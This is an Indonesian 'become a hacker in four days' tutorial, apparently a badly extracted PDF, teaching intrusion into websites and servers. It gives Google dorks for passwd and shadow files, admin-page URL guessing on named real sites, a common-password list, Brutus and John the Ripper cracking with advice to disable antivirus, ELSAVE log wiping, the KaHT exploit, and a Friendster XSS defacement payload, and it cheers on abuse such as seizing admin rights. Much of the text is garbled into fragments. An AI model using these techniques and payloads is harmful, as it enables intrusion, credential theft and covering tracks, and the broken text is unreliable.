4 Hari Jadi Hacker
4 Hari Jadi Hacker
4 Hari Jadi Hacker
HARI PERTAMA
BAB I
Hari Pertama
1. ANATOMI HACKING
1.1 Footprinting
1. Inner footprinting
2. Outer footprinting
Inner footprinting
5. kemudian ketik:
open namaservertarget port
Klik disini
Allow:
GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 295
Connection: close
Content-Type: text/html;
charset=iso-8859-1
Outer footprinting
- Webserver
- Tanggal terakhir site diupdate
- Dan lain lain
1.2 Scanning
IP ADDRESS
192.168.17.3
W X Y Z
Subnetting
A 255.0.0.0
B 255.255.0.0
C 255.255.255.0
Melakukan Subnetting
Contoh Kasus
4. Menentukan broadcast
Subnet 64 128 - -
Host Pertama
Host terakhir
Alamat Broadcast
127 191 - -
Port
Port dalam arti bahasa Indonesianya adalah
lubang. Tetapi kalau dalam komputer port diasumsikan
sebagai pintu service. Misalnya di komputer A membuka
port 21, maka kita tahu bahwa komputer A membuka diri
untuk sebuah pelayanan ftp (file transfer protocol. Berikut
ini adalah daftar standar untuk port :
server yang
mengirimkan
karakter
secara terus
menerus
sampai
hubungan ke
port ini
diputuskan.
Seringkali di
server-server
lama, jika
jumlah klien
yang
membuka
hubungan
mencapai nilai
ratusan
secara
sekaligus,
CPU time
akan
terkonsumsi
secara besar-
besaran,
mebuat sang
server
merangkak.
Serangan tipe
Denial of
Service paling
sederhana
adalah
dengan me-
redireksi
keluaran port
19 ke port lain
(mentargetka
n mesin-
mesin
Windows NT)
diberikan hak
yang sama
berdasar id
(jadi boleh
menulis ke
direktori
'home' milik
user tsb), atau
bahkan di
banyak
server, boleh
membaca /
tulis direktori
milik
pengguna
lain. Eksploit-
eksploit yang
beredar
termasuk
untuk
program-
program
wu_ftpd,
ncftpd,
ftpbounce, dll.
23 tcp telnet Telnet Metode login
jarak jauh
yang paling
populer.
Walaupun
tidak seaman
ssh (data
yang melintasi
tidak
dienkripsi
secara
otomatis),
masih terlalu
banyak
server-server
yang
mengizinkan
login jarak
jauh langsung
tipe ini
(sebagian
besar UNIX,
beberapa
VMS). Metode
ini pulalah
yang paling
sering
diserang oleh
chracker-
chracker,
terkadang
dengan se-
membabibuta
mengetikkan
root/daemon/
dll, dan
mencobakan
password-
password
default.
Seringkali
mesin-mesin
yang
sebenarnya
tidak
berfungsi
melayanin
user (seperti
dns,
webserver,
etc)
menjalankan
fungsi ini
walaupun
sebetulnya,
tidak begitu
diperlukan.
pengguna
suatu sistem
kepada sang
peminta
(seringkali
siapa saja).
Pada versi-
versi lama
Unix,
perintah:
finger
user@host1
@host2@etc
...(termas
uk
firewall)
menjadikan
sang peminta
lebih
anonimus
sebab
user@host1
akan melihat
bahwa
peminta
berasal dari
host2 atau
bahkan
firewall.
dijadikan
sasaran para
chracker
(terutama
ditargetkan
oleh program-
program
pelacak
kelemahan
CGI), sebab
banyak
program CGI
yang bisa
dieksploit.
Mesin-mesin
yang
menyediakan
servis
'Frontpage
Extensions'
secara default
terkenal
berlobang
besar, dan di-
'patch'. Ada
juga serangan
dari
pengunjung
yang
mencoba
mengakses
direktori-
direktori yang
terlindung
password
(contohnya di
situs-situs
porno)
dengan cara
mem-brute
force proses
otentifikasi
(UserID dan
Password),
sebab
serangan
semacam ini
tidak direkam
oleh log
server.
110 tcp/udp pop3 Post Office Protokol
standar
Protocol v3 pemeriksaan
email jarak
jauh.
Biasanya user
(atau program
e-mail client
user) melog-
on untuk
memeriksa
dan
mengambil
pesan email
yang diterima
lewat mailbox
server.
Hilangkan jika
anda tidak
membutuhkan
layanan ini
pada suatu
server.
Protokol ini
mengizinkan
siapapun
untuk
memasukkan
kombinasi
(lewat skrip)
user+passwor
d secara
'brute force'
tanpa
mencatat log.
111 tcp/udp sunrpc Sun Beberapa
portscanner
Remote mentargetkan
Procedure port ini, dan
Call terdapat
beberapa
program yang
mengeksploit
port ini
(mesin-mesin
Sun/Solaris).
139 tcp/udp netbios- NetBIOS Port inilah
yang
ssn Session biasanya
Service digunakan
sebagai
sarana
komunikasi
dengan atau
antara mesin-
mesin
Microsoft
(NT/95/98).
Penyerang
seringkali
mentargetkan
'shared
device' yang
bisa diakses
lewat internet.
Juga terdapat
banyak
program
'nuker' yang
men-denial-
of-service-kan
mesin-mesin
Windows via
port 139.
Selain di
mesin-mesin
NT, mesin-
mesin Unix
juga
menjalankan
servis di port
ini, yaitu
Samba, yang
memberikan
kemudahan
bernetwork
antara mesin
platform Unix
dengan mesin
Windows.
Jalankan
ADMSMB
scan atau
eksploit untuk
memeriksa
vulnerabilitas.
143 tcp/udp imap2 Interactive Protokol
pengaksesan
Mail e-mail
Access lainnya.
Protocol Seringkali
berjalan tanpa
diperlukan.
Mesin-mesin
UNIX
(terutama
Linux) yang
menjalankan
imap instalasi
default
terbuka
terhadap
serangan
yang bisa
berakibat
pemberian
privilese root
kepada sang
chracker.
443 tcp https Hypertext Daemon
penerima
Transfer permintaan
Protocol- tipe http yang
Secure berjalan
diatas 'secure
layer'
(terenkripsi).
Lihat
keterangan
untuk port 80
diatas.
512 tcp exec Remote Mengizinkan
eksekusi
Process proses jarak
Execution jauh dengan
sistem
autentifikasi
berdasar file
/etc/passwd.
513 tcp rlogin Remote Port inilah
yang
Login digunakan jika
Protocol anda
melakukan
'rlogin' ke
suatu host.
Dengan
rlogin, user di
host A tidak
perlu
melewati
proses login
lewat telnet ke
host B seperti
biasa, namun
bisa langsung
masuk ke
home
directorynya
di host B
(tanpa
password).
Jika seorang
chracker
berhasil
menjebol root
di salah satu
host, rlogin
adalah sarana
paling cocok
untuk
digunakan
'meloncat' ke
host lain
dalam
network yang
sama dan
mengambil
alih kontrol.
1. Download AngryIpScanner di
www.angryziber.com/ipscan/
Pinging www.indonesia.go.id
[203.130.230.3]
4. Buka angryIPScanner
80,3306
1.3 Enumeration
www.securitytracker.com
www.windowssecurity.com
www.hackerhomepage.com
1.4 Break-In
WINDOWS
- Kaht
- DCOM
- IIS Exploit
- SQL Injection Tools
- John The Ripper (Untuk melakukan
cracking password)
LINUX
- Exploit
- John The Ripper (Untuk Melakukan
Cracking Password)
Bab II
Hari Pertama
Filetype
Filetype adalah syntax yang berguna untuk mencari file
berekstensi tertentu di dalam website, syntax penulisan
dalam google adalah:
Contoh:
Site
Site berguna untuk memperlihatkan link yang ada di suatu
situs tertentu. Hal ini berguna untuk mepersempit
pencarian. Syntaxnya adalah:
Site:dnssite
Contoh:
Site:com
Site:co.id
Site:net
Inurl
Inurl bisa dianggap sebuah wildcard, bentuk penulisannya
adalah:
Inurl:wildcard
inurl:/etc/passwd
inurl:/etc/shadow
inurl:/dev/hdd
inurl:/etc/shadow
HARI KEDUA
Bab III
Hari Kedua
BERSEMEDI MEMPELAJARI
JURUS – JURUS HACKING
DIR /A
/cgi-
bin///////////////////////////////////////////////////////////////////////
////
/logs////////////////////////////////////////////////////////////////////
/lib//////////////////////////////////////////////////////////////////////
/////////
Contoh:
http://192.168.43.13/erstats///////////////////////////
Coba aja buka salah satu filenya, tapi yang ada tulisan,
Cookie:xxx, misalnya saya akan buka file
Cookie:aat@need2find.com, maka akan kebuka filenya,
sbb:
www.foundstone.com
http://192.168.17.66/B2BTradingPortal/
71e784a7a985e5d982dfb3360c647d85
a7a98
(4) (5)
(1)
Font = arial
1. Admin
2. Member
Member adalah tingkat yang tertinggi setelah
admin. User dengan tingkat member hanya dapat
mengerjakan beberapa perintah, misalnya
ahanya dapat mengirim pesan langsung ke admin
dan menerima pesan yang dikirimkan oleh admin.
Kalau di negara ya... dimisalkan seperti warga
negara lah.
3. Visitor
Terakhir adalah user dengan tingkatan paling
rendah, yaitu visitor. User ini hanya dapat melihat
web tanpa bisa mengirim pesan ke admin. Kalau
di negara ya dimisalkan turis dari luar negri
gituh.. ngertikan....
/set_preferences.asp
/send_password_preferences.asp
/SecureLoginManager/list.asp
/set_preferences.asp
http://www.target.com/admin/SecureLoginMan
ager/set_preferences.asp
/send_password_preferences.asp
http://www.target.com/admin/SecureLoginManager
/send_password_preferences.asp
/SecureLoginManager/list.asp
http://www.target.com/admin/SecureLoginMan
ager/list.asp
Wow ... wow keren kannnnn .... umh... yang pasti jika
bisa ke halaman ini anda bisa menyalahgunakannya untuk
mendaftarkan diri anda sebagai ADMIN ... enak kan ...
bahkan mengetahui seluruh password member atau
admin, seluruh email address member dan masih banyak
lagi lah. Kasarnya anda baru bekerja sehari di sebuah
kantor, tapi anda memegang kunci dokumen perusahaan,
kunci kas, kunci kamar mandi cewek dan kunci – kunci
penting lainnya. Anda dapat membuka kas, lemari
dokumen perusahaan dan kamar mandi cewek dengan
seenaknya ... bukankah itu menyenangkan
huihihihihihihi! (Set Iblis Mode On) -> Idih YM bangeth..
12345
abc123
password
computer
123456
tigger
1234
a1b2c3
qwerty
123
xxx
money
test
carmen
mickey
secret
summer
internet
service
...
- BRUTUS
- JOHN THE RIPPER (JTR)
BRUTUS
apa yang ingin anda ketahui ... internet itu luas was was
... banyak pengetahuan yang bisa didapat disitu ... dari
pengetahuan tentang wanita sampai pengetahuan
tentang teknologi, tapi satu ... internet tidak akan pernah
tau dimana TUHAN ... hihihihih! Sok agamis ah ....)
---------------------------------------------------------------------
UNTUK MENJALANKAN BRUTUS SEBAIKNYA ANDA
MEMATIKAN ANTIVIRUS, KARENA ANTIVIRUS
MENDETEKSI BRUTUS SEBAGAI MAILICIOUS CODE ATAU
John-mmx cracker.txt
2. Kemudian ketik
ELSAVE /?
-s \\server
Untuk mendefinisikan nama server dimana lo pengen
ngapus file log-nya.
-F file
Untuk menyimpan file log ke direktori dan nama file
tertentu
-l log
Untuk memberi nama log atau file log
-q
Parameter ini sebaiknya dijalankan ketika ELSAVE
menjadi sebuah service di windows, misalnya ingin
menjalankan ELSAVE tiap hari senin, tiap selasa, atau tiap
jam memnghapus log atau file log
-C
Menghapus file log yang tidak terdefinisi
Server Pelaku
1
HARI KETIGA
BAB IV
Hari Ketiga
Negara...
PROSES PENCARIAN/PENCURIAN
1. Komputer
2. Google
3. Kreatifitas
SYNTAX GOOGLE
filetype:
untuk mencari file berekstensi tertentu, kalau tadi di atas
kita menggunakan filetype:xls maksudnya kita hanya
mencari file .xls saja atau file excel...karena umumnya
PEMDA menulis APBD atau Laporan keuangan
menggunakan Excel... coba cari dengan extensi lain .mdb,
.doc atau .sql bisa gak???
site:site
di sini fasilitas untuk mencari di suatu situs tertentu, kalau
mau mencari di situs com saja ya tulis saja site:com atau
mau cari di situs berakhiran gov ya tulis site:gov
3. Pilih aja salah satu ... teserah yang mana ,... umh
kayaknya kita menemukan dey coba kita pilih
salah satu .... www.loisant.org
<script type="text/javascript">alert('XSS
BUG Ditemukan euy..')</script>
<script type="text/javascript">
Awal dari perintah html script dan mendefinisikan type
scriptnya adalah java script, masih ingat kan sebenarnya
bahasa pemrograman web itu ada vbscript, javascript dan
lain – lain...disini kita memakai java script
alert('XSS BUG Ditemukan euy..')
Membuat dan memunculkan kotak dengan isi ”XSS BUG
Ditemukan euy..” seperti pada gambar diatas itu ..
</script>
/set_preferences.asp
/send_password_preferences.asp
/SecureLoginManager/list.asp
/SecureLoginManager/list.asp
Aja okay ..
Ups ... terlalu kecil yah ... coba kita perbesar sedikit yah
http://www.ensaga.com/admin/SecureLoginManager/list.asp
/set_preferences.asp
http://www.ensaga.com/admin/SecureLoginManager/list.asp
Menjadi…
http://www.ensaga.com/admin/SecureLoginManager/set_pr
eferences.asp
Nah kalo udah muncul halaman kayak gini liat yang paling
atas, yang dilingkari pakek pulpen warna hitam, itulah
dia alamat form untuk login, tinggal dicopy ke web
browser, maka akan muncul form login tsb dan isi user
dan password sesuai dengan user dan password yang
anda dapatkan tadi ...
http://www.lansys.ch/support/config/etc/passwd-
http://www.lansys.ch/support/config/etc/shadow-
John-mmx cracker.txt
Cobra <birkr>
PERSIAPAN
PROSES PENYUSUPAN
Subnet :255.255.255.0
Setelah itu coba pakai exploit KaHT, apa itu KaHT, baca
aja sendiri … banyak di google okeh … cari ajah…:
---------------------------------------------------------------------
For admin please patch your system … mungkin serverbox
hanya sekedar infocenter … tapi dengan cara seperti ini
kemungkinan serverppmb atau yang lainnya dapat
dimasuki oleh yang lain …
---------------------------------------------------------------------
''''''''Begin Testimonial'''''''''''
Halo apa kabar ??? thanks yachh dah add gw...
<img src=http://mail.yahoo.com/config/login?/"" id="xxx"
style="height:expr_/**/ession(if(pageViewerID!=pageOwnerI
D){document.write('<body
bgcolor=black><b><br><br><center><font face=verdana
size=4pt color=white>HACKED BY bagus_badboy<br>Ur
Account Have been Deface by bagus_badboy<br><br>Sorry
Yach...<Br>Nothing is Secure..<br><Br><br><br>nobodys
servers is
safe..<br><br><br>bagus_badboy@yahoo.com<br></b>');doc
ument.title = '-friendster u gw ambil alih!!!-'});
width:expr_/**/ession(document.all.xxx.style.height='0px')"
/></img>
''''''''''''''End Testimonial''''''''''''
a. Profile dibajak
b. Testi Hilang, mau testinya hilang?
c. Poto berubah jadi yang aneh, iya kalo
foto bener…kalo foto bugil??? Yang jelas
orang yang membajak dapat mengirim
pesan lewat account FS kita
d. Nama account berubah
---------------------------------------------------------------------
Hati – hati dengan testimonial yang dikirimkan oleh teman
anda, jika mengandung kode – kode di atas
---------------------------------------------------------------------
HARI KEEMPRAT
MAKSUDNYA KEEMPAT
Bab V
Hari Keempat
Mana bauk tikus lagi ... wah wah wah .... Mana lagi lemari
gua??? Tempat CD bajakan yang gua burning juga gak
ada ... ke mana semua barang – barang gua ??? apa
kemalingan yah???
DUENNNNNNKKKKK
KKkk!!!!!!